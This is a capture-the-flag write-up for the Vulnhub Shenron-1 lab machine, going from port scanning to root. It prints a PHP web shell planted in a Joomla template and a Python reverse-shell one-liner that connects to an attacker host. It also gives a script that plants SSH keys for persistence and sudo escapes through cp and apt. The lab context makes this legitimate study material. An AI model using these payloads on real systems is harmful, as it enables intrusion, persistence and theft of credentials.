Vulnhub Shenron-1 write-up
Let's start with an nmap scan of all ports to find which ones are open. Command: sudo nmap -p- 192.168.9.74
Next, detect the service versions with a targeted nmap scan of the open ports. Command: sudo nmap -sV -sC -p22,80 192.168.9.74
Directory enumeration using dirb and gobuster. Both show that Joomla! is running on port 80.
Apart from Joomla, both dirb and gobuster show a test directory.
When we open the password file, it shows a message.
As common practice, always check the page's source code.
We have two places where we can try the username and password: SSH and the Joomla! login page. I tried it on Joomla! and it worked.
The next part is to get a shell on the box through Joomla!. There are a number of resources available for this, but what I chose is this.
Below are the steps to get a reverse shell through Joomla!.
1. Log in to the Joomla! admin console.
2. Go to Extensions → Templates → Templates.
3. Select the template to use. I chose Protostar.
4. Click on New File and choose a filename of your choice. I used my_shell, and don't forget to choose php as the extension. Then click the Create button.
5. You will see the screen below.
6. Put the lines below in as the PHP code. The first line is optional; you can skip it. Click the Save button.
<?php echo "This will execute command."; ?>
<?php echo shell_exec($_GET['cmd']); ?>
7. Now browse to my_shell.php. In our case it is http://<target-ip>/joomla/templates/protostar/my_shell.php
8. Time to test the RCE: append ?cmd=<command> to the URL. Remember to delete my_shell.php when you are done with the box; it is an unauthenticated backdoor usable by anyone who can reach the web server.
Time for a reverse shell.
To get a reverse shell on the system, we can choose a suitable payload from the PayloadsAllTheThings reverse shell cheatsheet. I used the payload below.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",attacker-port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
First start a netcat listener on the Kali machine with sudo nc -lvnp 443. Then send the payload above through the web shell to get the reverse shell. I used the payload after URL-encoding it.
Jenny user and password.
As part of basic enumeration, while checking the files in the Joomla directory, I found the username jenny and its password in /var/www/html/joomla/configuration.php
Switch to user jenny
To get a better shell, we can drop an SSH public key into /home/jenny/.ssh/authorized_keys on the box.
- Generate an SSH key pair with the ssh-keygen command on the attacker machine.
- Copy id_rsa.pub to shenron as /home/jenny/.ssh/id_rsa.pub.
- Move id_rsa.pub to authorized_keys and change its permissions to 600.
The command sudo -l shows that user jenny can run /usr/bin/cp as user shenron without a password.
To log in as user shenron, I downloaded id_rsa.pub from the Kali machine into a temp directory, moved it to authorized_keys and used sudo -u shenron /usr/bin/cp authorized_keys /home/shenron/.ssh/ Because cp runs as shenron, the copied file is owned by shenron, which is what sshd expects; the staged file must be readable by shenron, and /home/shenron/.ssh must already exist, since cp will not create it.
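The key drop for jenny and the sudo cp trick for shenron are the same procedure with different write paths. The script below is an added example, not the write-up's own commands: it installs a public key with the modes the write-up uses, checks them the way sshd's StrictModes does (it refuses a .ssh directory or authorized_keys file that is writable by group or other), and wraps the sudo -u shenron cp step. The home directory and key file paths are hypothetical.

```sh
#!/bin/sh
# Added example, not from the original write-up: the authorized_keys drop as a
# script, plus the mode checks sshd applies under StrictModes (the reason the
# write-up chmods authorized_keys to 600). Paths are hypothetical.

# Octal mode of a path (GNU stat first, BSD stat as fallback).
mode_of() { stat -c %a "$1" 2>/dev/null || stat -f %Lp "$1"; }

# sshd refuses keys if .ssh or authorized_keys is writable by group or other:
# accept only modes whose group and other digits have no write bit (0,1,4,5).
not_world_writable() {
  case "$(mode_of "$1")" in
    [0-7][0145][0145]) return 0 ;;
    *) return 1 ;;
  esac
}

# Append PUBKEY_FILE to HOME_DIR/.ssh/authorized_keys with the modes from the write-up.
install_authorized_key() {   # usage: install_authorized_key HOME_DIR PUBKEY_FILE
  _ssh="$1/.ssh"
  mkdir -p "$_ssh"
  chmod 700 "$_ssh"
  cat "$2" >> "$_ssh/authorized_keys"      # append, so existing keys keep working
  chmod 600 "$_ssh/authorized_keys"
}

# Verify the drop: returns 0 when sshd would accept the file, 1 with a reason otherwise.
check_authorized_key() {     # usage: check_authorized_key HOME_DIR
  _ssh="$1/.ssh"
  [ -d "$_ssh" ] || { echo "missing $_ssh"; return 1; }
  not_world_writable "$_ssh" || { echo "$_ssh is group/world writable"; return 1; }
  [ -s "$_ssh/authorized_keys" ] || { echo "no keys in $_ssh"; return 1; }
  not_world_writable "$_ssh/authorized_keys" || { echo "authorized_keys is group/world writable"; return 1; }
  return 0
}

# The jenny -> shenron step: we cannot write to /home/shenron/.ssh ourselves, but
# the sudo rule lets cp run as shenron, so the copied file ends up owned by shenron.
# The destination .ssh directory must already exist; cp will not create it.
push_key_via_sudo_cp() {     # usage: push_key_via_sudo_cp PUBKEY_FILE TARGET_USER
  cp "$1" /tmp/authorized_keys
  chmod 644 /tmp/authorized_keys          # readable by the target user, not writable by others
  sudo -u "$2" /usr/bin/cp /tmp/authorized_keys "/home/$2/.ssh/authorized_keys"
}
```

For jenny, run install_authorized_key /home/jenny id_rsa.pub and then check_authorized_key /home/jenny before trying to ssh in; a silent "Permission denied (publickey)" is almost always one of the two mode checks failing. For shenron, stage the key and call push_key_via_sudo_cp id_rsa.pub shenron; the 644 on the staged copy matters because cp runs as shenron and must be able to read it.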
SSH login as shenron
I used linpeas.sh, which showed me a file password.txt in the section "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)".
Again, sudo -l shows that user shenron can run /usr/bin/apt with sudo on shenron.
GTFOBins shows the options below for privilege escalation using apt.
I used the last one: sudo /usr/bin/apt update -o APT::Update::Pre-Invoke::=/bin/sh. The Pre-Invoke hook runs /bin/sh as root before apt fetches any package lists, so it works even when the box has no internet access.
Root on shenron-1
Thanks all for reading.